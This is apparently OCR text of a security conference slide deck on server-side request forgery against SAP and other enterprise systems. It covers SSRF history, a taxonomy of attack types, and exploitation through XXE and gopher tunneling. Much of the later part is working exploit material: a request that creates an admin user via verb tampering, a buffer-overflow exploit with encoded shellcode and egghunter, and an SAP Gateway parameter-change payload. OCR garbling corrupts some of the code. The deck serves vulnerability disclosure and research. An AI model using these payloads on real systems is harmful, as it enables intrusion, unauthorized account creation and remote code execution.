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Enterprise applications: Definitions 
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Business software is generally any software that 

helps business to increase its efficiency or 

measure their performance 


• Small (MS Office) 

• Medium (CRM, Shops) 

• Enterprise (ERP, BW...) 
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Any information an attacker might want, be it a 
cybercriminal, industrial spy or competitor, is 
stored in a company's ERP. This information can 
include financial, customer or public relations, 
intellectual property, personally identifiable 
information and more. Industrial espionage, 
sabotage and fraud or insider embezzlement may 
be very effective if targeted at the victim's ERP 
system and cause significant damage to the 
business. 














Business-critical systems architecture 


r 


j 


• Located in a secure subnetwork 


• Secured by firewalls 


• Monitored by IDS systems 


















Noahhh... 


But let's assume that they are 
because it will be much more 
interesting to attack them 


Secure corporate network 
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But wait. 

There must be some links 



Real corporate network 
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And... 

Attackers can use them! 


Corporate network attack scenario 
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But how? 




SSRF, as in Server Side Request Forgery. 

An attack which was discussed in 2008 with very 
little information about theory and practical 
examples. 

Like any new term, the SSRF doesn't show us 
something completely new like a new type of 
vulnerability. SSRF-style attacks were known 
before. 














SSRF History: Basics 
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• We send Packet A to Service A 

• Service A initiates Packet B to service B 

• Services can be on the same or different hosts 

• We can manipulate some fields of packet B within 
packet A 

• Various SSRF attacks depend on how many fields 
we can control on packet B 
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Packet A 


Packet B 











SSRF history: World research 




DeralHeiland - Shmoocon 2008 

- Web Portals Gateway To Information Or A Hole In Our 

Perimeter Defenses 

- Web portlets allow loading files from other HTTP 
sources 

- Possible to attack Internal network 

- SSRF via URL parameter 

Spiderlabs 2012 

- http://blog.spiderlabs.eom/2012/05/too-xxe-for-mv- 

shirt.html 

- SSRF via XXE 

Vladimir Vorontsov 2012 

- SSRF via XXE 




















SSRF history: My research 
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• SSRF is much more than listed examples 

• Begun thinking about different kinds of 
SSRF in 2009 

• Played with Oracle database hacks 
while writing a book 

The idea was to use minimum rights in 
one application to send something that 
can make maximum impact on another 
application. 
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SSRF History: My research in Oracle bypass 
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• Problem 

- An old vulnerability in Oracle listener in Set_log_file 

- Secured by LOCAL_OS_AUTHENTICATION in lOG 

• Attack 

- User with CONNECT privileges can run UTL_TCP 
functions 

- Using UTL_TCP it is possible to construct any TCP 
packet and send it to the listener 

- Connection will be from a local IP so we will bypass 
LOCAL OS AUTHENTICATION restrictions 
















SSRF History: ERPScan's research in SMBRealy 
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• SMBRelay is another example of SSRF 

• A UNC request can be initiated from different sources 

• We have collected information about different ways to 
call UNC path having minimum rights 

- From SAP NetWeaver ABAP 

- From SAP NetWeaver J2EE 

- From MSSQL 

- From Oracle DB 

- From browser 

- From USB 

- By spoofing 

- Etc. 

• It is published under the name ''SMBRelay Bible" 
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SSRF history: How to exploit 


















SSRF history: Conclusion 
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What we wanted to do here: 

• Collect the information about SSRF attacks 

• Categorize them 

• Show new SSRF attacks 

• Show examples of SSRF in SAP 
















SSRF at a glance 
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Ideal SSRF 
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The idea is to find victim server interfaces that 
will allow sending packets initiated by the victim 
server to the localhost interface of the victim 
server or to another server secured by a firewall 
from outside. Ideally this interface : 

Must allow sending any packet to any host and any port 
Must be accessed remotely without authentication 














SSRF Types 
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• Trusted SSRF (Can forge requests to remote 
services but only to predefined ones) 

• Remote SSRF (Can forge requests to any 
remote IP and port) 

— Simple Remote SSRF (No control on app 
level) 

- Partial Remote SSRF (Control in some 
fields of app level) 

— Full Remote SSRF (Control on app level) 
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Trusted SSRF 
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• Trusted because they can be exploited 
through predefined trusted connections. 

• RDBMS systems and ERP systems give you 
the functionality to make trusted links. 

• Through those predefined links, the attacker 
can send some packets to linked systems. 

• Need to have access to the application or a 
vulnerability like SQL Injection. 

• Examples 

- SAP NetWeaver 

- Oracle DB 

- MsSQL DB 
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Trusted SSRF: MsSQL 
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• Need at least public rights 

• Use MsSQL trusted links 

• Can be used with predefined passwords 

• Can be used to obtain info from host B 


Select * from openquery(ServiceB,'select * from @@version')] 
















Trusted SSRF: Oracle Database 
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• Need at least public rights 

• Use Oracle trusted links 

• Can be used with predefined passwords 

• Can be used to and obtain responses from 
Host B, 


SELECT * FROM myTable(S)HostB 

EXECUTE Schema.Package.Proceclure('Parameter')(5)HostB 














SSRF Types: SAP 

___ J 

I 

• SAP NetWeaver can have trusted links 

• Predefined in SM59 transaction 

• Use RFC protocol and user authentication 

• Usually with predefined passwords 

• Usually with SAP_ALL rights 

• Can be secured by bitJv/MkD7Ub 
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Can be exploited by connecting from TST to 

PRD system 
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Trusted SSRF: Conclusion 
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• Advantages for the attacker 

- Interesting 

- There are examples of dangerous attacks 
— Links usually exists across the enterprise 

- Attack is very stealthy because the 
behavior looks normal 

• Disadvantages 

- Username and password needed 
— Existing link needed 














Remote SSRF 
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More interesting class: 

• Control what to send and how 

• Forge requests to any host and any port 
from a trusted source even if you cannot 
connect to those hosts directly 

• Connect to services which only listen 
localhost interface as well 

• Depending on what exactly we can control 
there are at least 3 types of Remote SSRFs 
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Remote SSRF: Subtypes 



Simple 

■ 

Partial 

■ 

Full 

A 


Can't control 

Packet B application level 


Control some fields in Control all fields in 

Packet B application level Packet B application level 


Dest IP 
Dest port 


Application level 
packet 











The most popular example is the ability to 
remotely scan for open ports and IP addresses 

Affected software: 

- SAP NetWeaver wsnavigator (sapnote 1394544,871394) 

- SAP NetWeaver ipcpricing (sapnote 1545883) 

- SAP BusinessObjects viewrpt (sapnote 1583610) 
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Simple Remote SSRF: port scan via ipcpricing JSP 
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It is possible to scan internal network from the Internet 

Authentication is not required 

SAP NetWeaver J2EE engine is vulnerable 


/ipcpricing/ui/BufferOverview.jsp? 

server=172.16.0.13 
& port=31337 
& dispatcher= 

& targetClient= 

& view= 

















Simple Remote SSRF: Port scan via ipcpricing JSP 















































































Partial Remote SSRF: Ability to control fields 
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The most popular type with many examples 

• Remote Login bruteforce 

• Remote File read 

• SMBrelay 

• HTTP Attacks to other services 

• XXE attacks 
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Simple Remote SSRF: Login bruteforce 



• SAP J2EE web application 

• Still patching (can't disclose) 


• Possible to connect to any host and test 
password 

• If service is running on external SAP 
Portal it is possible to remotely from 
the Internet: 

- Bruteforce logins to internal resources and 
then continue with other attacks 

- Bruteforce logins until they are locked (Denial 
of Service) 
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Partial Remote SSRF: SMBRelay 




• SMBRelay - a Windows bug which can be exploited by 
forging a UNC connection to system that we control 

• As a result, it is possible to get access to Windows server 
within rights of <SID>adm user 

• Dozens of different possibilities to forge a UNC connection 

- From SAP webservices (sapnote 1503579,1498575) 

- From RFC functions (sapnote 1554030) 

- From SAP transactions, reports (sapnote 1583286) 


Possible from every place where you can call something 
from remote path like\\172.16.0.1\file but you need to be 

inside the network 















Partial Remote SSRF: HTTP attacks to other services 
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• Many places where you can call HTTP URLs 
— Transactions 

- Reports 
— RFC functions 
— Web services 
-XML Entities 

• Connection will be initiated by server to 
another server so you can bypass firewall 
restrictions 
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Partial Remote SSRF: HTTP attacks to other services 
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XXE Attacks on other services 
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• Via XXE it is also possible to run HTTP calls 

<?xml version="1.0" encoding="ISO-8859-l"?> 

<!DOCTYPEfoo[ 

<!ELEMENTfoo ANY> 

<!ENTITYxxel SYSTEM "http://172.16.0.1:80/someservice" >]> 
<foo>8ixxel;</foo> 


Successfully executed a similar attack on a 
banking system during a pen-test. 














XXE Attacks in SAP 
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• There are many XML interfaces in a SAP 
application 

• Many of them are vulnerable to XXE 

• There are patches from SAP 

• Most of those services require authentication 

• But we want to do this without auth 
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UJE CAN ONLY 
AFFORD TO FIX THE 
HIGH-PRIORITY 
BUGS. 


IF UE DONT FIX 
100% OF THE BUGS. 
THE SOFTUARE UJILL 
BE 100% USELESS. 
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DilbertMSG Web service in SAP © 
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• DilbertMSG web service 

• No I'm not kidding 

• Use Soap XML 

• Fortesting purpose 

• Shipped with SAP PI < 7.1 by default 

• Accessed without authorization 

• Patched just month ago in SAP Security note 1707494 

















DilbertMSG Web service in SAP © 
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j (5) 172.16.0.63:50100/)aSOAP^ x 


[°1 


^ ^ C 0 172.16.0.63:50100/XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG 


☆ ^ 


This XML file does not appear to hav'e any st>’le information associated with it. The document tree is shown below'. 


T<diii3g: statements xmlns :dmsg="http ://sap. com/fun/dilbert/msg" title="Mission Statements"> 

▼ <! — 

see http://172.16.0.63:50100/XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?help for usage options 
▼<statement> 

The customer can count on us to quiclcly administrate diverse deliverables. 

</statement> 

</dmsg : statements> 
























What can we do next ? 
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• Usually, XXE is used to call an HTTP or UNC path 

• But there are much more interesting options 
depending on the parser: 

- ftp:// 

— Idap:// 

- jar:// 

- gopher:// 

- mailto:// 

- ssh2:// 

• All of them allow connecting to special services 
and send special commands (Partial SSRF) 

• But they are not universal... or 
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Okay, so Full Remote SSRF 



Full Remote SSRF 
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Server A (Portal or XI) 























How? 


Gopher uri scheme 
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<?xml version="1.0" encoding="ISO-8859-l"?> 

<!DOCTYPE foo [ 

<!ELEMENTfoo ANY> 

<!ENTITYdate SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >]> 
<foo>&date;</foo> 
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XXE Tunneling 
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Server A (Portal or XI) 


POST /XISOAPAdapter/servlet/ 
com.sap.aii.af.mp.soap.web.DilbertMSG? 
format=post HTTP/1.1 

Host: 192.168.0.1:8000 


<?xml version="1.0" encoding="ISO-8859-l"?> 
<!DOCTYPEfoo[ 

<!ELEMENTfoo ANY > 


<!ENTITY date SYSTEM "gopher:// 
172.16.0.1:3300/AAAAAAAAA" >]> 
<foo>&date;</foo> 






























Exploiting SAP with XXE tunnel 



Why SAP? 
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• Because we spend a lot of time 
researching SAP 

• Because it is a very popular business 
application 

• Because we found an XML interface 
with XXE which can be exploited 
anonymously 

• Because we can :)) 
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Remote SSRF threats 
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• Exploit OS vulnerabilities 


• Exploit old SAP Application 
vulnerabilities 


• Bypass SAP security restrictions 


• Exploit vulnerabilities in local services 















XXE Tunneling to Verb Tampering 




• Verb Tampering architecture vulnerability in SAP J2EE 
engine 

• Was presented by me at the previous BlackHat 

• Patched by SAP in security note 1589525 

• Allows unauthorized access to NetWeaver web services 

- Creation new user with any role 

- Run OS commands 

- Remotely turn OFF application server 

• Many companies still don't patch 

• Some companies disable access by WebDIspatcher (ACL) 

• It means that the vulnerability still exists 


















XXE Tunneling to Verb Tampering 
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POST /XISOAPAdapter/servlet/ 
com.sap.aii.af.mp.soap.web.DilbertMSG? 
format=post HTTP/1.1 

Host: company.com: 80 


<?xml version="1.0" 
encocling=" ISO-8859-1" ?> 

<!DOCTYPEfoo[ 

<!ELEMENTfoo ANY> 

<! ENTITY date SYSTEM "gopher:// 
172.16.0.1:3300/HEAD /ctc/ConfigServlet? 
param=com.sap.ctc.utiT.UserConfig; 
CREATEUSER; 

USERNAME=HACKER,PASSWORD=PassWOrd 
" >]> 

<foo>&date;</foo> 



Server A on the Internet 
(WebDispatcher) 




http://company.com 



To 172.16.0.1 port 50000 


/HEAD /ctc/ConfigServlet? 
param=com.sap.etc.util.UserConfi 
g;CREATEUSER;USERNAME=HACK 
ER,PASSWORD=PassWOrd 


Server B in DMZ 



No such service 404 
(filtered by WebDispatcher) 


GET/CTC 



(SAP Portal) 



172.16.0.1 


























XXE Tunneling to Buffer Overflow 

_ ^^^ 
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• A buffer overflow vulnerability found by Virtual 
Forge in ABAP Kernel (fixed in sapnote 1487330) 

• Hard to exploit because it requires calling an RFC 
function which calls Kernel function 

• But even such a complex attack can be exploited 

• Get ready for the hardcore 


















XXE Tunneling to Buffer Overflow (Hint 1) 



• It is hard (maybe not possible) to exploit it by an 
RFC call because it needs multiple packets to call 
the RFC function 


• So we decided to exploit it via WEBRFC 

• Can be fixed by sapnotes: 
1394100,1536640,1528822,1453457 

• According to our report, even on the Internet 
WEBRFC is installed in 40% of NetWeaver ABAP 
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XXE Tunneling to Buffer Overflow (Hint 2) 
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• Shellcode size is limited to 255 bytes (name 
parameter) 

• As we don't have direct connection to the 
Internet from the vulnerable system, we want to 
use DNS tunneling shellcode to connect back 

• But the XML engine saves some XML data in RWX 
memory 

• So we can use egghunter 

• Any shellcode can be uploaded 













XXE Tunneling to Buffer Overflow: Packet B 


POST /sap/bc/soap/rfc?sap-client=000 HTTP/1.1 
Authorization: Basic UlFQKjowMjA3NTk3== 
Host: company.com:80 
User-Agent: ERPSCAN Pentesting tool v 0.2 
Content-Type: text/xnni; charset=utf-8 
Cookie: sap-client=000 
Content-Length: 2271 


<SOAP-ENV:Envelope xnnlns:SOAP-ENV="http://schennas.xnnlsoap.org/soap/envelope/" xnnlns:SOAP-ENC="http:// 

schennas.xnnlsoap.org/soap/encoding/" xnnlns:xsi="http://www.w3.org/2001/XMLSchenna-instance" xnnlns:xsd="http:// 

www.w3.org/2001/XMLSchenna"><SOAP-ENV:Body><nn:RSPO_R_SAPGPARAM xnnlns:nn="urn:sap- 

conn:docunnent:sap:rfc:functions"><HEAP_EGG>dsecdsechffffk4diFkDwj02Dwk0D7AuEE4y4O3f2s3a064M7n2M0e0P2N5 

k054N4r4n0G4z3c4M3O4o8M4q0F3417005Oln7L3m0Z0O0J4l8O0j0y7L5m3E2r0b0m0ElO4w0Z3z3B4Z0r2H3b3G7m8n 

0p3BlNlm4Q8P4s2K4W4C8L3v3U3h5O0t3B3h3i3Z7k0a0q3D0F0p4k2H3l0n3h5L0u7k3P2p0018058N0a3qlK8L4Q2mlO 

0D8K3R0H2v0c8m5p2t5o4z0K3r7o0S4s0s3y4y3Z5p0Y5K0c053q5M0h3q4t3B0d0D3n4N0G3p082L4slK5o3q012s4z2H0y 

lk4C0B153X3j0G4n2J0X0W7o3K2Z260j2N4j0x2q2H4S0w030g323h3il27N165n3Z0W4N390Y2q4z4o2o3r0U3t2o0a3p4o 

3T0x4k315N3i0l3ql64l0Q0p8O3A07040M0A3u4P3A7p3B2t058n3Q02VTX10X41PZ41H4A4KlTG91TGFVTZ32PZNBFZDW 

E02DWF0D71DJE5I4N3V6340065M2Z6M1R112NOK066N5G4Z0C5J425J3N8N8M5AML4D17015OKN7M3X0Z1K0J388N0Z 

1N0MOL3B621S1Q1T1O5GKK3JJO4P1E0X423GMMNO6P3B141M4Q3A5C7N4W4C8M9R3U485HK03B49499J2Z0V1F3EM 

L0QJK2O482N494M1D173Q110018049N7J401K9L9X101O0N3Z450J161T5M90649U4ZMM3S9Y1C5C1C9Y3S3Z300Y5K1X 

2D9P4M6M9T5D3B1T0D9N4O0M3T082L5D2KOO9V0J0W5J2H1N7Z4D62LO3H9O1FJN7M0Y1PMO3J0G2I1ZLO3D0X612 

O4T2C010G353948137O074X4V0W4O5Z68615JJOLO9R0T9ULO1V8K384E1HJK305N44KP9RKK4I0Q6P3U3J2F032J0A9W4 

S4Q2A9U69659R4A06aaaaaaaaaaaaaaaaaaaaa</ 

HEAP_EGG><NAME>&#186;&#255;&#255;&#206;&#060;&#102;&#129;&#202;&#255;&#015;&#066;&#082;&#106;&#0 

67;&#088;&#205;&#046;&#060;&#005;&#090;&#116;&#239;&#184;&#100;&#115;&#101;&#099;&#139;&#250;&#175; 

&#117;&#234;&#175;&#117;&#231;&#255;&#231;&#144;&#144;&#144;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAA&#158;&#14;&#190;&#171;DSEC&#094;&#023;&#012;&#001;&#252;&#049;&#0 

43;&#001;&#212;&#083;&#242;&#000;&#018;&#058;&#071;&#000;&#250;&#047;&#057;&#016;&#076;&#255;&#084; 

&#000;&#001;&#002;&#000;&#000;&#226;&#020;&#095;&#000;&#064;&#000;&#000;&#000;&#097;&#125;&#088;&# 

016;&#115;&#167;&#113;&#002;&#117;&#218;&#157;&#000;&#004;&#128;&#069;&#000;&#082;&#089;&#012;&#016 

;&#235;&#004;&#235;&#002;&#134;&#027;&#198;&#000;&#255;&#255;&#233;&#077;&#255;&#255;&#255;&#255;AA 

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</name></ 

m:RSPO_R_SAPGPARAM></SOAP-ENV:Body></SOAP-ENV:Envelope> 













XXE Tunneling to Buffer Overflow (Hint 3) 


• Next Step is to pack this packet B into Packet A 

• We need to insert non-printable symbols 

• God bless gopher; it supports uriencode like HTTP 

• It will also help us evade attack against IDS systems 



POST /XISOAPAdapter/servlet/com.sap.aii.af.nnp.soap.web.DilbertMSG?format=post HTTP/1.1 
Host: sapserver.com:80 
Content-Length: 7730 


<?xml version="1.0" encoding="ISO-8859-l"?> 
<!DOCTYPEfooI 
<!ELEMENTfoo ANY > 

<!ENTITY date SYSTEM "gopher:/ 
<foo>8idate;</foo> 


^[Urlencoded Packet B] 
































Final exploit: Packet B in packet A 



t=post HTTP/1.1 


Content-Length: 7730 


<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE in [<!ENTITY foo SYSTEM "gopher://172.16.10.65:8000/%50%4f%53%54%20%2f%73%61%70%2f%62%63%2f%73%6f%61%70%2f%72%66%63%3f 



'4%3a%20%3 l%37%32%2e%3 l%36%2e%3 l%30%2e%36%35%3a 


%38%30%30%30%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%45%52%50%53%43%41%4e%20%50%65%6e%74%65%73%74%69%6e%67%20%74%6f%6f%6c%20%76%20%30%2e 

%32%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%74%65%78%74%2f%78%6d%6c%3b%20%63%68%61%72%73%65%74%3d%75%74%66%2d%38%0d%0a%43%6f%6f%6b 


%69%65%3a%20%73%61%70%2d%63%6c%69%65%6e%74%3d%30%30%30%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%32%32%37%31%0d%0a%0d%0a%3c%53%4f 

%41%50%2d%45%4e%56%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%53%4f%41%50%2d%45%4e%56%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e 


%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%73%6f%61%70%2f%65%6e%76%65%6c%6f%70%65%2f%22%20%78%6d%6c%6e%73%3a%53%4f%41%50%2d%45%4e%43%3d 

%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%73%6f%61%70%2f%65%6e%63%6f%64%69%6e%67%2f%22%20%78%6d%6c%6e 








%61%22%3e%3c%53%4f%41%50%2d%45%4e%56%3a%42%6f%64%79%3e%3c%6d%3a%52%53%50%4f%5f%52%5f%53%41%50%47%50%41%52%41%4d%20%78%6d%6c%6e%73%3a%6d%3d 

%22%75%72%6e%3a%73%61%70%2d%63%6f%6d%3a%64%6f%63%75%6d%65%6e%74%3a%73%61%70%3a%72%66%63%3a%66%75%6e%63%74%69%6f%6e%73%22%3e%3c%48%45%41%50%5f 


%45%47%47%3e%64%73%65%63%64%73%65%63%68%66%66%66%66%6b%34%64%69%46%6b%44%77%6a%30%32%44%77%6b%30%44%37%41%75%45%45%34%79%34%4f 

%33%66%32%73%33%61%30%36%34%4d%37%6e%32%4d%30%65%30%50%32%4e%35%6b%30%35%34%4e%34%72%34%6e%3047%34%7a%33%63%34%4d%33%4f%34%6f%38%4d 


%34%71%30%46%33%34%31%37%30%30%35%4f%31%6e%37%4c%33%6d%30%5a%30%4f%30%4a%34%6c%38%4f%30%6a%30%79%37%4c%35%6d%33%45%32%72%30%62%30%6d 

%30%45%31%4f%34%77%30%5a%33%7a%33%42%34%5a%30%72%32%48%33%62%33%47%37%6d%38%6e%30%70%33%42%31%4e%31%6d%34%51%38%50%34%73%32%4b 


j_i 



%33%52%30%48%32%76%30%63%38%6d%35%70%32%74%35%6f%34%7a%30%4b%33%72%38%6f%30%53%34%73%30%73%33%79%34%79%33%5a%35%70%30%59%35%4b 

%30%63%30%35%33%71%35%4d%30%68%33%71%34%74%33%42%30%64%30%44%33%6e%34%4e%30%47%33%70%30%38%32%4c%34%73%31%4b%35%6f%33%71%30%31%32%73%34%7a 

%32%48%30%79%31%6b%34%43%30%42%31%35%33%58%33%6a%30%47%34%6e%32%4a%30%58%30%57%37%6f%33%4b%32%5a%32%43%30%6a%32%4e%34%6a 






/o32%37%4e%31%36%35%6e%33%5a%30%57%34%4e%33%39%30%59%32%71%34%7a%34%6f%32%6f 

,31%35%4e%33%69%30%49%33%71%31%36%34%49%30%51%30%70%38%4f 


%33%41%30%37%30%34%30%4d%30%41%33%75%34%50%33%41%37%70%33%42%32%74%30%35%38%6e%33%51%30%32%56%54%58%31%3058%34%31%50%5a%34%31%48%34%41%34%4b 

%31%54%47%39%31%54%47%46%56%54%5a%33%32%50%5a%4e%42%46%5a%44%57%45%30%32%44%57%46%30%44%37%31%44%4a%45%35%49%34%4e 


%33%56%36%33%34%30%30%36%35%4d%32%5a%36%4d%31%52%31%31%32%4e%4f%4b%30%34%34%4e%35%47%34%5a%30%43%35%4a%34%32%35%4a%33%4e%38%4e%38%4d%35%41%4d 

%4c%34%44%31%37%30%31%35%4f%4b%4e%37%4d%33%58%30%5a%31%4b%30%4a%33%38%38%4e%30%5a%31%4e%30%4d%4f%4c%33%42%36%32%31%53%31%51%31%54%31%4f 


%35%47%4b%4b%33%4a%4a%4f%34%50%31%45%30%58%34%32%33%47%4d%4d%4e%4f%36%50%33%42%31%34%31%4d%34%51%33%41%35%43%37%4e%34%57%34%43%38%4d 

%39%52%33%55%34%38%35%48%4b%30%33%42%34%39%34%39%39%4a%32%5a%30%56%31%46%33%45%4d%4c%30%51%4a%4b%32%4f%34%38%32%4e%34%39%34%4d 


%31%44%31%37%33%51%31%31%30%30%31%38%30%34%39%4e%37%4a%34%30%31%4b%39%4c%39%58%31%30%31%4f%30%4€ 

%39%30%36%34%39%55%34%5a%4d%4d%33%53%39%59%31%43%35%43%31%43%39%59%33%53%33%5a%33%30%30%59%35%4 


! 1%36%3 l%54%35%4d 
34%4d%36%4d 



%39%54%35%44%33%42%31%54%30%44%39%4e%34%4f%30%4d%33%54%30%38%32%4c%35%44%32%4b%4f%f%39%56%30%4a%30%57%35%4a%32%48%31%4e%37%5a%34%44%36%32%4c%4f 

%33%48%39%4f%31%46%4a%4e%37%4d%30%59%31%50%4d%4f%33%4a%30%47%32%49%31%5a%4c%4f%33%44%30%58%36%31%32%4f 



yo39%52%30%54%39%55%4c%4f 

4a 







%30%41%39%57%34%53%34%51%32%41%39%55%36%39%36%35%39%52%34%41%30%36%61%61%61%61%61%61%61%61%61%61%61%61%61%61%61%61%61%61%61%61%61%3c%2f 

%48%45%41%50%5f%45%47%47%3e%3c%4e%41%4d%45%3e%26%23%31%38%36%3b%26%23%32%35%35%3b%26%23%32%35%35%3b%26%23%32%30%36%3b%26%23%30%36%30%3b 



%26%23%30%39%30%3b%26%23%31%31%36%3b%26%23%32%33%39%3b%26%23%31%38%34%3b%26%23%31%30%30%3b%26%23%31%31%35%3b%26%23%31%30%31%3b 

%26%23%30%39%39%3b%26%23%31%33%39%3b%26%23%32%35%30%3b%26%23%31%37%35%3b%26%23%31%31%37%3b%26%23%32%33%34%3b%26%23%31%37%35%3b 

%26%23%31%31%37%3b%26%23%32%33%31%3b%26%23%32%35%35%3b%26%23%32%33%31%3b%26%23%31%34%34%3b%26%23%31%34%34%3b%26%23%31%34%34%3b 

%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41 

%41%41%41%41%41%41%41%41%41%41%41%41%41%26%23%31%35%38%3b%26%23%31%34%3b%26%23%31%39%30%3b%26%23%31%37%31%3b%44%53%45%43%26%23%30%39%34%3b 

%26%23%30%32%33%3b%26%23%30%31%31%3b%26%23%30%30%31%3b%26%23%32%35%32%3b%26%23%30%34%39%3b%26%23%30%34%33%3b%2623%30%30%31%3b 

%26%23%32%31%32%3b%26%23%30%38%33%3b%26%23%32%34%32%3b%26%23%30%30%30%3b%26%23%30%31%38%3b%26%23%30%35%38%3b%26%23%30%37%31%3b 


%26%23%30%32%30%3b%26%23%30%39%35%3b%26%23%30%30%30%3b%26%23%30%36%34%3b%26%23%30%30%30%3b%26%23%30%30%30%3b%26%23%30%30%30%3b 

%26%23%30%39%37%3b%26%23%31%32%35%3b%26%23%30%38%38%3b%26%23%30%31%36%3b%26%23%31%31%35%3b%26%23%31%36%37%3b%26%23%31%31%33%3b 



%26%23%30%30%32%3b%26%23%31%31%37%3b%26%23%32%31%38%3b%26%23%31%35%37%3b%26%23%30%30%30%3b%26%23%30%30%34%3b%26%23%31%32%38%3b 

%26%23%30%36%39%3b%26%23%30%30%30%3b%26%23%30%38%32%3b%26%23%30%38%39%3b%26%23%30%31%32%3b%26%23%30%31%36%3b%26%23%32%33%35%3b 


%26%23%30%30%34%3b%26%23%32%33%35%3b%26%23%30%30%32%3b%26%23%31%33%34%3b%26%23%30%32%37%3b%26%23%31%39%38%3b%26%23%30%30%30%3b 
%26%23%32%35%35%3b%26%23%32%35%35%3b%26%23%32%33%33%3b%26%23%30%37%37%3b%26%23%32%35%35%3b%26%23%32%35%35%3b%26%23%32%5%35%3b 
%26%23%3 2%35%35%3 b 

%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41 
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%3c%2f%4e%41%4d%45%3e%3c%2f%6d%3a%52%53%50%4f%5f%52%5f 
%53%41%50%47%50%41%52%41%4d%3e%3c%2f%53%4f%41%50%2d%45%4e%56%3a%42%6f%64%79%3e%3c%2f%53%4f%41%50%2d%45%4e%56%3a%45%6e%76%65%6c%6f 
%70%65%3e">]><dmsg:generate xmlns:dmsg='http://sap.com/fun/dilbert/msg' title='&foo;'>l</dmsg:generate> 














































XXE Tunneling to Buffer Overflow 




Server A on the 
Internet 
(SAP XI) 



POST /XISOAPAdapter/servlet/ 
com.sap.aii.af.mp.soap.web.DilbertMSG? 
format=post HTTP/1.1 
Host: sapserver.com:80 

<?xml version="1.0" encoding="ISO-8859-l"?> 
<!DOCTYPEfoo [ 

<!ELEMENTfoo ANY> 

<!ENTITY date SYSTEM "gopher://[packetB]" 
>]> 

<foo>8idate;</foo> 



http://company.com 


Server B in DMZ 


























Full control over the internal system through 

the Internet 


XXE Tunneling to Rsh 

^^ 

r . I 

• Riogin is an old service 

• But many old unix systems like HP-UX, AIX, SunOS 
have it by default 

• Many SAP systems based on listed OS 

• In SAP it is used to execute trusted commands 

• Riogin allows to get shell access remotely 

• Potentially exploitable via XXE 
















SSRF threats 


_ j 

^ -^ 

• Exploit any old vulnerabilities in OS or database because 
systems secured by firewall usually lack patches 

• Exploit old SAP Application vulnerabilities 

• Bypass SAP security restrictions 

• A way to open new vulnerabilities 

















Bypass SAP security restrictions 


r 




It is possible to bypass many SAP Security restrictions. 
However, it is not so easy and it needs additional research 
for every service. 


• SAP Gateway 

• SAP Message Server 

• Oracle Remote OS Authentication 

• Other remote services 



















SAP Gateway server security bypass 




• SAP Gateway - remote management of SAP 

• Different attacks are possible like registering fake RFC 
service 

• Now secured by the gw/monitor option 

- 0: No monitor commands are accepted 

- 1: Only monitor commands from the local gateway monitor 
are accepted 

- 2: Monitor commands from local and remote monitors are 
accepted. 

• With XXE Tunneling, we can act like a local monitor 
bypassing restriction 

• For example we can change SAP Gateway parameters 






















1 . 

2 . 


3. 


SAP Gateway server security bypass 



s for sending binary data through Gopher 

You need to encode non-character data using Uriencode 

Gopher is changing some of the first symbols of packet to 
its own. 

- To bypass it, you need to enter any symbol before the packet 

- This symbol will be deleted and no changes will occur 

Symbols from 8A to 99 are not allowed so if they exist in 
the packet: 

You can't exploit the vulnerability 

You should replace them with those symbols which are allowed and 
hope that they are not necessary 


1 . 

2 . 


3. 



It was found that in Gateway protocol symbol 
88 is used but it can be changed 























SAP Gateway server security bypass: Exploit 




POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post 
HTTP/1.1 


Host: 172.16.10.63:8001 
Content-Length: 621 


<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE in [<!ENTITY 
Itt SYSTEM "gopher://172.16.0.1:3301/a%00%00%00%7A 
%43%4F%4E%54%00%02%00%7A%67%77%2F%6D 
%61%78%5F%73%6C 

%65%65%70%00%00%00%00%79%02%00%00%00%00%00%0 

0%28%DE%D9%00%79%5F%00%74%08%B5%38%7C 

%00%00%00%00%44%DE 

%D9%00%00%00%00%00%00%00%00%00%70%DE 

%D9%00%00%00%00%00%EA%1E 

%43%00%08%38%38%00%00%00%00%00%10%44%59%00%1 

8%44%59%00%00%00%00%00%64%DE%D9%00%79%5F 

%00%74%08%B5%38%7C%00%00%00%00%79%DE 

%D9%00%00%00%00%7A%DE%D9%00%B3%56%35%7C 

%48%EF%38%7C%5F%57%35%7C%0A 

%00%00%00%B8%EE">]><dmsg:generate xmlns:dmsg='http:// 
sap.com/fun/dilbert/msg' title='&ltt;'>l</dmsg:generate> 





















SAP Message Server security bypass 




• Message Server: load balancer 

• If not configured properly can be vulnerable to different 
attacks like configuring fake application server or changing 
parameters 

• However by default it is secured by the ms/monitor option 
now 

- 0: Only application servers are allowed to change the 
internal memory of the message server and perform 
monitoring functions (default). 

- 1: External (monitoring ) programs are also allowed to 
do this. 




















Message Server using a session 

It needs to send multiple packets to execute an 
attack 

Seems impossible but 

More time needed for investigation 















Oracle DB security bypass 

__ J 

r I 

• Oracle DB: backend that stores all data 

• If not configured properly can be vulnerable to 
unauthorized access using the <SID >adnn 
username only without password 

• To secure Oracle DB, it is recommended to: 

